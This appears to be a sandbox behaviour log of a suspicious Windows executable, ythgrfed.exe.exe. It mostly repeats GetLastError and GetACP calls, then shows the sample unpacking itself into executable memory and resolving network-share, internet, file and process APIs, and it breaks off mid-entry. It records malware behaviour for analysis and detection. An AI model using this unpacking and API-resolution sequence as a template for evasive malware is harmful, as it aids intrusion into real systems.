# Flog Txt Version 1 # Analyzer Version: 3.2.1 # Analyzer Build Date: Jan 31 2020 07:36:36 # Log Creation Date: 31.01.2020 12:39:14.270 Process: id = "1" image_name = "ythgrfed.exe.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ythgrfed.exe.exe" page_root = "0x35861000" os_pid = "0x734" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x444" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x54c [0051.299] GetLastError () returned 0x0 [0051.300] GetACP () returned 0x4e4 [0051.300] GetLastError () returned 0x0 [0051.300] GetACP () returned 0x4e4 [0051.300] GetLastError () returned 0x0 [0051.300] GetACP () returned 0x4e4 [0051.300] GetLastError () returned 0x0 [0051.300] GetACP () returned 0x4e4 [0051.300] GetLastError () returned 0x0 [0051.300] GetACP () returned 0x4e4 [0051.300] GetLastError () returned 0x0 [0051.300] GetACP () returned 0x4e4 [0051.300] GetLastError () returned 0x0 [0051.300] GetACP () returned 0x4e4 [0051.300] GetLastError () returned 0x0 [0051.300] GetACP () returned 0x4e4 [0051.300] GetLastError () returned 0x0 [0051.300] GetACP () returned 0x4e4 [0051.300] GetLastError () returned 0x0 [0051.300] GetACP () returned 0x4e4 [0051.300] GetLastError () returned 0x0 [0051.300] GetACP () returned 0x4e4 [0051.300] GetLastError () returned 0x0 [0051.300] GetACP () returned 0x4e4 [0051.300] GetLastError () returned 0x0 [0051.300] GetACP () returned 0x4e4 [0051.300] GetLastError () returned 0x0 [0051.300] GetACP () returned 0x4e4 [0051.300] GetLastError () returned 0x0 [0051.300] GetACP () returned 0x4e4 [0051.300] GetLastError () returned 0x0 [0051.300] GetACP () returned 0x4e4 [0051.300] GetLastError () returned 0x0 [0051.300] GetACP () returned 0x4e4 [0051.300] GetLastError () returned 0x0 [0051.300] GetACP () returned 0x4e4 [0051.300] GetLastError () returned 0x0 [0051.300] GetACP () returned 0x4e4 [0051.300] GetLastError () returned 0x0 [0051.301] GetACP () returned 0x4e4 [0051.301] GetLastError () returned 0x0 [0051.301] GetACP () returned 0x4e4 [0051.301] GetLastError () returned 0x0 [0051.301] GetACP () returned 0x4e4 [0051.301] GetLastError () returned 0x0 [0051.301] GetACP () returned 0x4e4 [0051.301] GetLastError () returned 0x0 [0051.301] GetACP () returned 0x4e4 [0051.301] GetLastError () returned 0x0 [0051.301] GetACP () returned 0x4e4 [0051.301] GetLastError () returned 0x0 [0051.301] GetACP () returned 0x4e4 [0051.301] GetLastError () returned 0x0 [0051.301] GetACP () returned 0x4e4 [0051.301] GetLastError () returned 0x0 [0051.301] GetACP () returned 0x4e4 [0051.301] GetLastError () returned 0x0 [0051.301] GetACP () returned 0x4e4 [0051.301] GetLastError () returned 0x0 [0051.301] GetACP () returned 0x4e4 [0051.301] GetLastError () returned 0x0 [0051.301] GetACP () returned 0x4e4 [0051.301] GetLastError () returned 0x0 [0051.301] GetACP () returned 0x4e4 [0051.301] GetLastError () returned 0x0 [0051.301] GetACP () returned 0x4e4 [0051.301] GetLastError () returned 0x0 [0051.301] GetACP () returned 0x4e4 [0051.301] GetLastError () returned 0x0 [0051.301] GetACP () returned 0x4e4 [0051.301] GetLastError () returned 0x0 [0051.301] GetACP () returned 0x4e4 [0051.301] GetLastError () returned 0x0 [0051.301] GetACP () returned 0x4e4 [0051.301] GetLastError () returned 0x0 [0051.301] GetACP () returned 0x4e4 [0051.301] GetLastError () returned 0x0 [0051.301] GetACP () returned 0x4e4 [0051.301] GetLastError () returned 0x0 [0051.301] GetACP () returned 0x4e4 [0051.301] GetLastError () returned 0x0 [0051.302] GetACP () returned 0x4e4 [0051.302] GetLastError () returned 0x0 [0051.302] GetACP () returned 0x4e4 [0051.302] GetLastError () returned 0x0 [0051.302] GetACP () returned 0x4e4 [0051.302] GetLastError () returned 0x0 [0051.302] GetACP () returned 0x4e4 [0051.302] GetLastError () returned 0x0 [0051.302] GetACP () returned 0x4e4 [0051.302] GetLastError () returned 0x0 [0051.302] GetACP () returned 0x4e4 [0051.302] GetLastError () returned 0x0 [0051.302] GetACP () returned 0x4e4 [0051.302] GetLastError () returned 0x0 [0051.302] GetACP () returned 0x4e4 [0051.302] GetLastError () returned 0x0 [0051.302] GetACP () returned 0x4e4 [0051.302] GetLastError () returned 0x0 [0051.302] GetACP () returned 0x4e4 [0051.302] GetLastError () returned 0x0 [0051.302] GetACP () returned 0x4e4 [0051.302] GetLastError () returned 0x0 [0051.302] GetACP () returned 0x4e4 [0051.302] GetLastError () returned 0x0 [0051.302] GetACP () returned 0x4e4 [0051.302] GetLastError () returned 0x0 [0051.302] GetACP () returned 0x4e4 [0051.302] GetLastError () returned 0x0 [0051.302] GetACP () returned 0x4e4 [0051.302] GetLastError () returned 0x0 [0051.302] GetACP () returned 0x4e4 [0051.302] GetLastError () returned 0x0 [0051.303] GetACP () returned 0x4e4 [0051.303] GetLastError () returned 0x0 [0051.303] GetACP () returned 0x4e4 [0051.303] GetLastError () returned 0x0 [0051.303] GetACP () returned 0x4e4 [0051.303] GetLastError () returned 0x0 [0051.303] GetACP () returned 0x4e4 [0051.303] GetLastError () returned 0x0 [0051.303] GetACP () returned 0x4e4 [0051.303] GetLastError () returned 0x0 [0051.303] GetACP () returned 0x4e4 [0051.303] GetLastError () returned 0x0 [0051.303] GetACP () returned 0x4e4 [0051.303] GetLastError () returned 0x0 [0051.303] GetACP () returned 0x4e4 [0051.303] GetLastError () returned 0x0 [0051.303] GetACP () returned 0x4e4 [0051.303] GetLastError () returned 0x0 [0051.303] GetACP () returned 0x4e4 [0051.303] GetLastError () returned 0x0 [0051.303] GetACP () returned 0x4e4 [0051.303] GetLastError () returned 0x0 [0051.303] GetACP () returned 0x4e4 [0051.303] GetLastError () returned 0x0 [0051.303] GetACP () returned 0x4e4 [0051.303] GetLastError () returned 0x0 [0051.303] GetACP () returned 0x4e4 [0051.303] GetLastError () returned 0x0 [0051.303] GetACP () returned 0x4e4 [0051.303] GetLastError () returned 0x0 [0051.303] GetACP () returned 0x4e4 [0051.303] GetLastError () returned 0x0 [0051.303] GetACP () returned 0x4e4 [0051.304] GetLastError () returned 0x0 [0051.304] GetACP () returned 0x4e4 [0051.304] GetLastError () returned 0x0 [0051.304] GetACP () returned 0x4e4 [0051.304] GetLastError () returned 0x0 [0051.304] GetACP () returned 0x4e4 [0051.304] GetLastError () returned 0x0 [0051.304] GetACP () returned 0x4e4 [0051.304] GetLastError () returned 0x0 [0051.304] GetACP () returned 0x4e4 [0051.304] GetLastError () returned 0x0 [0051.304] GetACP () returned 0x4e4 [0051.304] GetLastError () returned 0x0 [0051.304] GetACP () returned 0x4e4 [0051.304] GetLastError () returned 0x0 [0051.304] GetACP () returned 0x4e4 [0051.304] GetLastError () returned 0x0 [0051.304] GetACP () returned 0x4e4 [0051.304] GetLastError () returned 0x0 [0051.304] GetACP () returned 0x4e4 [0051.304] GetLastError () returned 0x0 [0051.304] GetACP () returned 0x4e4 [0051.304] GetLastError () returned 0x0 [0051.304] GetACP () returned 0x4e4 [0051.304] GetLastError () returned 0x0 [0051.304] GetACP () returned 0x4e4 [0051.304] GetLastError () returned 0x0 [0051.304] GetACP () returned 0x4e4 [0051.304] GetLastError () returned 0x0 [0051.304] GetACP () returned 0x4e4 [0051.304] GetLastError () returned 0x0 [0051.304] GetACP () returned 0x4e4 [0051.304] GetLastError () returned 0x0 [0051.305] GetACP () returned 0x4e4 [0051.305] GetLastError () returned 0x0 [0051.305] GetACP () returned 0x4e4 [0051.305] GetLastError () returned 0x0 [0051.305] GetACP () returned 0x4e4 [0051.305] GetLastError () returned 0x0 [0051.305] GetACP () returned 0x4e4 [0051.305] GetLastError () returned 0x0 [0051.305] GetACP () returned 0x4e4 [0051.305] GetLastError () returned 0x0 [0051.305] GetACP () returned 0x4e4 [0051.305] GetLastError () returned 0x0 [0051.305] GetACP () returned 0x4e4 [0051.305] GetLastError () returned 0x0 [0051.305] GetACP () returned 0x4e4 [0051.305] GetLastError () returned 0x0 [0051.305] GetACP () returned 0x4e4 [0051.305] GetLastError () returned 0x0 [0051.305] GetACP () returned 0x4e4 [0051.305] GetLastError () returned 0x0 [0051.305] GetACP () returned 0x4e4 [0051.305] GetLastError () returned 0x0 [0051.305] GetACP () returned 0x4e4 [0051.305] GetLastError () returned 0x0 [0051.305] GetACP () returned 0x4e4 [0051.305] GetLastError () returned 0x0 [0051.305] GetACP () returned 0x4e4 [0051.305] GetLastError () returned 0x0 [0051.305] GetACP () returned 0x4e4 [0051.305] GetLastError () returned 0x0 [0051.305] GetACP () returned 0x4e4 [0051.305] GetLastError () returned 0x0 [0051.305] GetACP () returned 0x4e4 [0051.305] GetLastError () returned 0x0 [0051.305] GetACP () returned 0x4e4 [0051.305] GetLastError () returned 0x0 [0051.305] GetACP () returned 0x4e4 [0051.305] GetLastError () returned 0x0 [0051.305] GetACP () returned 0x4e4 [0051.306] GetLastError () returned 0x0 [0051.306] GetACP () returned 0x4e4 [0051.306] GetLastError () returned 0x0 [0051.306] GetACP () returned 0x4e4 [0051.306] GetLastError () returned 0x0 [0051.306] GetACP () returned 0x4e4 [0051.306] GetLastError () returned 0x0 [0051.306] GetACP () returned 0x4e4 [0051.306] GetLastError () returned 0x0 [0051.306] GetACP () returned 0x4e4 [0051.306] GetLastError () returned 0x0 [0051.306] GetACP () returned 0x4e4 [0051.306] GetLastError () returned 0x0 [0051.306] GetACP () returned 0x4e4 [0051.306] GetLastError () returned 0x0 [0051.306] GetACP () returned 0x4e4 [0051.306] GetLastError () returned 0x0 [0051.306] GetACP () returned 0x4e4 [0051.306] GetLastError () returned 0x0 [0051.306] GetACP () returned 0x4e4 [0051.306] GetLastError () returned 0x0 [0051.306] GetACP () returned 0x4e4 [0051.306] GetLastError () returned 0x0 [0051.306] GetACP () returned 0x4e4 [0051.306] GetLastError () returned 0x0 [0051.306] GetACP () returned 0x4e4 [0051.306] GetLastError () returned 0x0 [0051.306] GetACP () returned 0x4e4 [0051.306] GetLastError () returned 0x0 [0051.306] GetACP () returned 0x4e4 [0051.306] GetLastError () returned 0x0 [0051.306] GetACP () returned 0x4e4 [0051.306] GetLastError () returned 0x0 [0051.306] GetACP () returned 0x4e4 [0051.306] GetLastError () returned 0x0 [0051.306] GetACP () returned 0x4e4 [0051.306] GetLastError () returned 0x0 [0051.306] GetACP () returned 0x4e4 [0051.306] GetLastError () returned 0x0 [0051.307] GetACP () returned 0x4e4 [0051.307] GetLastError () returned 0x0 [0051.307] GetACP () returned 0x4e4 [0051.307] GetLastError () returned 0x0 [0051.307] GetACP () returned 0x4e4 [0051.307] GetLastError () returned 0x0 [0051.307] GetACP () returned 0x4e4 [0051.307] GetLastError () returned 0x0 [0051.307] GetACP () returned 0x4e4 [0051.307] GetLastError () returned 0x0 [0051.307] GetACP () returned 0x4e4 [0051.307] GetLastError () returned 0x0 [0051.307] GetACP () returned 0x4e4 [0051.307] GetLastError () returned 0x0 [0051.307] GetACP () returned 0x4e4 [0051.307] GetLastError () returned 0x0 [0051.307] GetACP () returned 0x4e4 [0051.307] GetLastError () returned 0x0 [0051.307] GetACP () returned 0x4e4 [0051.307] GetLastError () returned 0x0 [0051.307] GetACP () returned 0x4e4 [0051.307] GetLastError () returned 0x0 [0051.307] GetACP () returned 0x4e4 [0051.307] GetLastError () returned 0x0 [0051.307] GetACP () returned 0x4e4 [0051.307] GetLastError () returned 0x0 [0051.307] GetACP () returned 0x4e4 [0051.307] GetLastError () returned 0x0 [0051.307] GetACP () returned 0x4e4 [0051.307] GetLastError () returned 0x0 [0051.307] GetACP () returned 0x4e4 [0051.307] GetLastError () returned 0x0 [0051.307] GetACP () returned 0x4e4 [0051.307] GetLastError () returned 0x0 [0051.307] GetACP () returned 0x4e4 [0051.307] GetLastError () returned 0x0 [0051.307] GetACP () returned 0x4e4 [0051.307] GetLastError () returned 0x0 [0051.307] GetACP () returned 0x4e4 [0051.307] GetLastError () returned 0x0 [0051.307] GetACP () returned 0x4e4 [0051.308] GetLastError () returned 0x0 [0051.308] GetACP () returned 0x4e4 [0051.308] GetLastError () returned 0x0 [0051.308] GetACP () returned 0x4e4 [0051.308] GetLastError () returned 0x0 [0051.308] GetACP () returned 0x4e4 [0051.308] GetLastError () returned 0x0 [0051.308] GetACP () returned 0x4e4 [0051.308] GetLastError () returned 0x0 [0051.308] GetACP () returned 0x4e4 [0051.308] GetLastError () returned 0x0 [0051.308] GetACP () returned 0x4e4 [0051.308] GetLastError () returned 0x0 [0051.308] GetACP () returned 0x4e4 [0051.308] GetLastError () returned 0x0 [0051.308] GetACP () returned 0x4e4 [0051.308] GetLastError () returned 0x0 [0051.308] GetACP () returned 0x4e4 [0051.308] GetLastError () returned 0x0 [0051.308] GetACP () returned 0x4e4 [0051.308] GetLastError () returned 0x0 [0051.308] GetACP () returned 0x4e4 [0051.308] GetLastError () returned 0x0 [0051.308] GetACP () returned 0x4e4 [0051.308] GetLastError () returned 0x0 [0051.308] GetACP () returned 0x4e4 [0051.308] GetLastError () returned 0x0 [0051.308] GetACP () returned 0x4e4 [0051.308] GetLastError () returned 0x0 [0051.308] GetACP () returned 0x4e4 [0051.308] GetLastError () returned 0x0 [0051.308] GetACP () returned 0x4e4 [0051.308] GetLastError () returned 0x0 [0051.308] GetACP () returned 0x4e4 [0051.308] GetLastError () returned 0x0 [0051.308] GetACP () returned 0x4e4 [0051.308] GetLastError () returned 0x0 [0051.308] GetACP () returned 0x4e4 [0051.308] GetLastError () returned 0x0 [0051.308] GetACP () returned 0x4e4 [0051.308] GetLastError () returned 0x0 [0051.309] GetACP () returned 0x4e4 [0051.309] GetLastError () returned 0x0 [0051.309] GetACP () returned 0x4e4 [0051.309] GetLastError () returned 0x0 [0051.309] GetACP () returned 0x4e4 [0051.309] GetLastError () returned 0x0 [0051.309] GetACP () returned 0x4e4 [0051.309] GetLastError () returned 0x0 [0051.309] GetACP () returned 0x4e4 [0051.309] GetLastError () returned 0x0 [0051.309] GetACP () returned 0x4e4 [0051.309] GetLastError () returned 0x0 [0051.309] GetACP () returned 0x4e4 [0051.309] GetLastError () returned 0x0 [0051.309] GetACP () returned 0x4e4 [0051.309] GetLastError () returned 0x0 [0051.309] GetACP () returned 0x4e4 [0051.309] GetLastError () returned 0x0 [0051.309] GetACP () returned 0x4e4 [0051.309] GetLastError () returned 0x0 [0051.309] GetACP () returned 0x4e4 [0051.309] GetLastError () returned 0x0 [0051.309] GetACP () returned 0x4e4 [0051.309] GetLastError () returned 0x0 [0051.309] GetACP () returned 0x4e4 [0051.309] GetLastError () returned 0x0 [0051.309] GetACP () returned 0x4e4 [0051.309] GetLastError () returned 0x0 [0051.309] GetACP () returned 0x4e4 [0051.309] GetLastError () returned 0x0 [0051.309] GetACP () returned 0x4e4 [0051.309] GetLastError () returned 0x0 [0051.309] GetACP () returned 0x4e4 [0051.309] GetLastError () returned 0x0 [0051.309] GetACP () returned 0x4e4 [0051.309] GetLastError () returned 0x0 [0051.309] GetACP () returned 0x4e4 [0051.309] GetLastError () returned 0x0 [0051.309] GetACP () returned 0x4e4 [0051.309] GetLastError () returned 0x0 [0051.309] GetACP () returned 0x4e4 [0051.309] GetLastError () returned 0x0 [0051.310] GetACP () returned 0x4e4 [0051.310] GetLastError () returned 0x0 [0051.310] GetACP () returned 0x4e4 [0051.310] GetLastError () returned 0x0 [0051.310] GetACP () returned 0x4e4 [0051.310] GetLastError () returned 0x0 [0051.310] GetACP () returned 0x4e4 [0051.310] GetLastError () returned 0x0 [0051.310] GetACP () returned 0x4e4 [0051.310] GetLastError () returned 0x0 [0051.310] GetACP () returned 0x4e4 [0051.310] GetLastError () returned 0x0 [0051.310] GetACP () returned 0x4e4 [0051.310] GetLastError () returned 0x0 [0051.310] GetACP () returned 0x4e4 [0051.310] GetLastError () returned 0x0 [0051.310] GetACP () returned 0x4e4 [0051.310] GetLastError () returned 0x0 [0051.310] GetACP () returned 0x4e4 [0051.310] GetLastError () returned 0x0 [0051.310] GetACP () returned 0x4e4 [0051.310] GetLastError () returned 0x0 [0051.310] GetACP () returned 0x4e4 [0051.310] GetLastError () returned 0x0 [0051.310] GetACP () returned 0x4e4 [0051.310] GetLastError () returned 0x0 [0051.310] GetACP () returned 0x4e4 [0051.310] GetLastError () returned 0x0 [0051.310] GetACP () returned 0x4e4 [0051.310] GetLastError () returned 0x0 [0051.310] GetACP () returned 0x4e4 [0051.310] GetLastError () returned 0x0 [0051.310] GetACP () returned 0x4e4 [0051.310] GetLastError () returned 0x0 [0051.310] GetACP () returned 0x4e4 [0051.310] GetLastError () returned 0x0 [0051.310] GetACP () returned 0x4e4 [0051.310] GetLastError () returned 0x0 [0051.310] GetACP () returned 0x4e4 [0051.310] GetLastError () returned 0x0 [0051.310] GetACP () returned 0x4e4 [0051.310] GetLastError () returned 0x0 [0051.311] GetACP () returned 0x4e4 [0051.311] GetLastError () returned 0x0 [0051.311] GetACP () returned 0x4e4 [0051.311] GetLastError () returned 0x0 [0051.311] GetACP () returned 0x4e4 [0051.311] GetLastError () returned 0x0 [0051.311] GetACP () returned 0x4e4 [0051.311] GetLastError () returned 0x0 [0051.311] GetACP () returned 0x4e4 [0051.311] GetLastError () returned 0x0 [0051.311] GetACP () returned 0x4e4 [0051.311] GetLastError () returned 0x0 [0051.311] GetACP () returned 0x4e4 [0051.311] GetLastError () returned 0x0 [0051.311] GetACP () returned 0x4e4 [0051.311] GetLastError () returned 0x0 [0051.311] GetACP () returned 0x4e4 [0051.311] GetLastError () returned 0x0 [0051.311] GetACP () returned 0x4e4 [0051.311] GetLastError () returned 0x0 [0051.311] GetACP () returned 0x4e4 [0051.311] GetLastError () returned 0x0 [0051.311] GetACP () returned 0x4e4 [0051.311] GetLastError () returned 0x0 [0051.311] GetACP () returned 0x4e4 [0051.311] GetLastError () returned 0x0 [0051.311] GetACP () returned 0x4e4 [0051.311] GetLastError () returned 0x0 [0051.311] GetACP () returned 0x4e4 [0051.311] GetLastError () returned 0x0 [0051.311] GetACP () returned 0x4e4 [0051.311] GetLastError () returned 0x0 [0051.311] GetACP () returned 0x4e4 [0051.311] GetLastError () returned 0x0 [0051.311] GetACP () returned 0x4e4 [0051.311] GetLastError () returned 0x0 [0051.311] GetACP () returned 0x4e4 [0051.311] GetLastError () returned 0x0 [0051.311] GetACP () returned 0x4e4 [0051.311] GetLastError () returned 0x0 [0051.312] GetACP () returned 0x4e4 [0051.312] GetLastError () returned 0x0 [0051.312] GetACP () returned 0x4e4 [0051.312] GetLastError () returned 0x0 [0051.312] GetACP () returned 0x4e4 [0051.312] GetLastError () returned 0x0 [0051.312] GetACP () returned 0x4e4 [0051.312] GetLastError () returned 0x0 [0051.312] GetACP () returned 0x4e4 [0051.312] GetLastError () returned 0x0 [0051.312] GetACP () returned 0x4e4 [0051.312] GetLastError () returned 0x0 [0051.312] GetACP () returned 0x4e4 [0051.312] GetLastError () returned 0x0 [0051.312] GetACP () returned 0x4e4 [0051.312] GetLastError () returned 0x0 [0051.312] GetACP () returned 0x4e4 [0051.312] GetLastError () returned 0x0 [0051.312] GetACP () returned 0x4e4 [0051.312] GetLastError () returned 0x0 [0051.312] GetACP () returned 0x4e4 [0051.312] GetLastError () returned 0x0 [0051.312] GetACP () returned 0x4e4 [0051.312] GetLastError () returned 0x0 [0051.312] GetACP () returned 0x4e4 [0051.312] GetLastError () returned 0x0 [0051.312] GetACP () returned 0x4e4 [0051.312] GetLastError () returned 0x0 [0051.312] GetACP () returned 0x4e4 [0051.312] GetLastError () returned 0x0 [0051.312] GetACP () returned 0x4e4 [0051.312] GetLastError () returned 0x0 [0051.312] GetACP () returned 0x4e4 [0051.312] GetLastError () returned 0x0 [0051.312] GetACP () returned 0x4e4 [0051.608] LocalAlloc (uFlags=0x0, uBytes=0x90e9d) returned 0x210020 [0051.727] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0051.729] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualProtect") returned 0x76e2435f [0051.729] VirtualProtect (in: lpAddress=0x210020, dwSize=0x90e9d, flNewProtect=0x40, lpflOldProtect=0x18f744 | out: lpflOldProtect=0x18f744*=0x4) returned 1 [0051.768] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0051.768] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalAlloc") returned 0x76e2588e [0051.768] GetProcAddress (hModule=0x76e10000, lpProcName="GetLastError") returned 0x76e211c0 [0051.768] GetProcAddress (hModule=0x76e10000, lpProcName="Sleep") returned 0x76e210ff [0051.768] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0051.768] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0051.768] GetProcAddress (hModule=0x76e10000, lpProcName="Module32First") returned 0x76ea5cd9 [0051.768] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0051.769] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x44 [0051.772] Module32First (hSnapshot=0x44, lpme=0x18f4d0) returned 1 [0051.774] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x540000 [0051.831] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryA") returned 0x76e249d7 [0051.831] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0051.831] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0051.831] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualProtect") returned 0x76e2435f [0051.831] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualFree") returned 0x76e2186e [0051.831] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersionExA") returned 0x76e23519 [0051.832] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0051.832] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0051.832] GetProcAddress (hModule=0x76e10000, lpProcName="SetErrorMode") returned 0x76e21b00 [0051.832] SetErrorMode (uMode=0x400) returned 0x0 [0051.832] SetErrorMode (uMode=0x0) returned 0x400 [0051.832] GetVersionExA (in: lpVersionInformation=0x18e400*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}5w") | out: lpVersionInformation=0x18e400*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0051.832] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x7f0000 [0051.857] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18f488 | out: lpflOldProtect=0x18f488*=0x2) returned 1 [0052.086] VirtualFree (lpAddress=0x7f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0052.092] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x768e0000 [0052.092] GetProcAddress (hModule=0x768e0000, lpProcName="RpcStringFreeW") returned 0x76901635 [0052.092] GetProcAddress (hModule=0x768e0000, lpProcName="UuidCreate") returned 0x768ff48b [0052.092] GetProcAddress (hModule=0x768e0000, lpProcName="UuidToStringW") returned 0x76921ee5 [0052.092] GetProcAddress (hModule=0x768e0000, lpProcName="RpcStringFreeA") returned 0x76923fc5 [0052.092] GetProcAddress (hModule=0x768e0000, lpProcName="UuidToStringA") returned 0x7695d918 [0052.092] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x74570000 [0052.295] GetProcAddress (hModule=0x74570000, lpProcName="WNetOpenEnumW") returned 0x74572f06 [0052.295] GetProcAddress (hModule=0x74570000, lpProcName="WNetEnumResourceW") returned 0x74573058 [0052.295] GetProcAddress (hModule=0x74570000, lpProcName="WNetCloseEnum") returned 0x74572dd6 [0052.295] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75190000 [0063.849] GetProcAddress (hModule=0x75190000, lpProcName="InternetCloseHandle") returned 0x751aab49 [0063.849] GetProcAddress (hModule=0x75190000, lpProcName="InternetReadFile") returned 0x751ab406 [0063.849] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenUrlW") returned 0x7520be5c [0063.849] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenW") returned 0x751b9197 [0063.849] GetProcAddress (hModule=0x75190000, lpProcName="HttpQueryInfoW") returned 0x751b5c75 [0063.850] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenA") returned 0x751bf18e [0063.850] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenUrlA") returned 0x751d30f1 [0063.850] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x74530000 [0064.379] GetProcAddress (hModule=0x74530000, lpProcName="timeGetTime") returned 0x745326e0 [0064.379] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x753b0000 [0064.379] GetProcAddress (hModule=0x753b0000, lpProcName="PathAppendA") returned 0x753bd65e [0064.379] GetProcAddress (hModule=0x753b0000, lpProcName="PathFindFileNameW") returned 0x753cbb71 [0064.379] GetProcAddress (hModule=0x753b0000, lpProcName="PathRemoveFileSpecW") returned 0x753c3248 [0064.379] GetProcAddress (hModule=0x753b0000, lpProcName="PathFileExistsA") returned 0x753ead1a [0064.379] GetProcAddress (hModule=0x753b0000, lpProcName="PathFileExistsW") returned 0x753c45bf [0064.379] GetProcAddress (hModule=0x753b0000, lpProcName="PathAppendW") returned 0x753c81ef [0064.380] GetProcAddress (hModule=0x753b0000, lpProcName="PathFindExtensionW") returned 0x753ca1b9 [0064.380] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76e10000 [0064.380] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualFree") returned 0x76e2186e [0064.380] GetProcAddress (hModule=0x76e10000, lpProcName="WriteFile") returned 0x76e21282 [0064.380] GetProcAddress (hModule=0x76e10000, lpProcName="GetDriveTypeA") returned 0x76e3ef75 [0064.380] GetProcAddress (hModule=0x76e10000, lpProcName="OpenProcess") returned 0x76e21986 [0064.380] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalAlloc") returned 0x76e2588e [0064.380] GetProcAddress (hModule=0x76e10000, lpProcName="GetSystemDirectoryW") returned 0x76e25063 [0064.380] GetProcAddress (hModule=0x76e10000, lpProcName="WideCharToMultiByte") returned 0x76e2170d [0064.380] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryW") returned 0x76e2492b [0064.380] GetProcAddress (hModule=0x76e10000, lpProcName="Sleep") returned 0x76e210ff [0064.380] GetProcAddress (hModule=0x76e10000, lpProcName="CopyFileW") returned 0x76e4830d [0064.380] GetProcAddress (hModule=0x76e10000, lpProcName="FormatMessageW") returned 0x76e24620 [0064.381] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpynW") returned 0x76e4d556 [0064.381] GetProcAddress (hModule=0x76e10000, lpProcName="CreateProcessA") returned 0x76e21072 [0064.381] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0064.381] GetProcAddress (hModule=0x76e10000, lpProcName="ReadFile") returned 0x76e23ed3 [0064.381] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileW") returned 0x76e23f5c [0064.381] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcatA") returned 0x76e42b7a [0064.381] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentVariableA") returned 0x76e233a0 [0064.381] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcmpW") returned 0x76e25929 [0064.381] GetProcAddress (hModule=0x76e10000, lpProcName="MultiByteToWideChar") returned 0x76e2192e [0064.381] GetProcAddress (hModule=0x76e10000, lpProcName="lstrlenW") returned 0x76e21700 [0064.381] GetProcAddress (hModule=0x76e10000, lpProcName="FlushFileBuffers") returned 0x76e2469b [0064.381] GetProcAddress (hModule=0x76e10000, lpProcName="GetShortPathNameA") returned 0x76e4594d [0064.381] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileSizeEx") returned 0x76e259e2 [0064.381] GetProcAddress (hModule=0x76e10000, lpProcName="GetLastError") returned 0x76e211c0 [0064.382] GetProcAddress (hModule=0x76e10000, lpProcName="SetLastError") returned 0x76e211a9 [0064.382] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcAddress") returned 0x76e21222 [0064.382] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0064.382] GetProcAddress (hModule=0x76e10000, lpProcName="MoveFileW") returned 0x76e39af0 [0064.382] GetProcAddress (hModule=0x76e10000, lpProcName="FindClose") returned 0x76e24442 [0064.382] GetProcAddress (hModule=0x76e10000, lpProcName="Process32FirstW") returned 0x76e48baf [0064.382] GetProcAddress 